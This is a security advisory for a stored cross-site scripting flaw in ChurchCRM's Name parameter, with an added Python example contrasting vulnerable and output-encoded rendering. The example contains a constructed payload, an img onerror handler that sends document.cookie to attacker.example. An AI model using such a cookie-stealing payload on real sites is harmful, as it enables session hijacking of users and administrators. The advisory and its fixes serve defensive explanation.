Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in ChurchCRM - CVE-2025-68401


Published: April 9, 2026


Vulnerability identifier: #VU125719
CSH Severity: Low
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Clear
CVE-ID: CVE-2025-68401
CWE-ID: CWE-79
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: ChurchCRM
Affected software:
ChurchCRM

Detailed vulnerability description

The vulnerability allows a remote user to execute arbitrary script in victims' browsers and disclose sensitive information.

The vulnerability exists due to insufficient sanitization of user-supplied data in the Name parameter: the value is stored and later rendered into a page without output encoding. A remote privileged user can submit crafted HTML or JavaScript that is executed in the browser of any other user who views the affected page, allowing the attacker to run arbitrary script in that user's session and disclose sensitive information.

Where the session cookie is not marked HttpOnly, the injected script can read it through document.cookie. Exploitation requires a victim to view the stored content; victims may include privileged users such as administrators or moderators.
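The following Python is an added illustration of the pattern the advisory describes, not code from ChurchCRM (which is written in PHP). The function names, the cookie name CRMSESSID and the payload string are all constructed for the example. It shows the CWE-79 rendering pattern beside its output-encoded form, a write-path check that rejects markup in a personal name, and the HttpOnly flag that the caveat above refers to.

```python
import html
import re

# Constructed attacker payload: what a privileged user might submit as a
# member's display name. Invented for this example, not from the advisory.
EVIL_NAME = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'


def render_member_card_vulnerable(name: str) -> str:
    """Interpolates the stored name straight into HTML (the CWE-79 pattern).

    Whatever was stored is emitted verbatim, so a stored payload becomes
    live markup in every viewer's browser.
    """
    return f'<div class="member"><span class="name">{name}</span></div>'


def render_member_card_safe(name: str) -> str:
    """Same markup, but the name is HTML-escaped at output time.

    quote=True also escapes ' and ", so the value is safe inside an
    attribute value as well as in an element body.
    """
    safe = html.escape(name, quote=True)
    return f'<div class="member"><span class="name" title="{safe}">{safe}</span></div>'


# A personal name never legitimately contains angle brackets or HTML entities.
_TAG_OR_ENTITY = re.compile(r"[<>]|&#?\w+;")


def looks_like_markup(name: str) -> bool:
    """Defence-in-depth check for the write path.

    Rejecting markup on input does not replace output encoding (the fix that
    actually closes CWE-79), but it keeps the payload out of the database.
    """
    return bool(_TAG_OR_ENTITY.search(name))


def session_cookie_header(session_id: str, httponly: bool = True, secure: bool = True) -> str:
    """Builds a Set-Cookie header value for a hypothetical CRMSESSID cookie.

    Without HttpOnly, an injected script can read the session id through
    document.cookie and exfiltrate it, as the constructed payload attempts.
    """
    parts = [f"CRMSESSID={session_id}", "Path=/", "SameSite=Lax"]
    if secure:
        parts.append("Secure")
    if httponly:
        parts.append("HttpOnly")
    return "; ".join(parts)


if __name__ == "__main__":
    print(render_member_card_vulnerable(EVIL_NAME))
    print(render_member_card_safe(EVIL_NAME))
    print(looks_like_markup(EVIL_NAME), looks_like_markup("Mary O'Brien"))
    print(session_cookie_header("deadbeef"))
```

Output encoding at render time is the control that removes the vulnerability; the input check and the HttpOnly flag only limit what a stored payload can reach if encoding is missed somewhere.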


How to mitigate CVE-2025-68401

Install the security update from the vendor's website.

Sources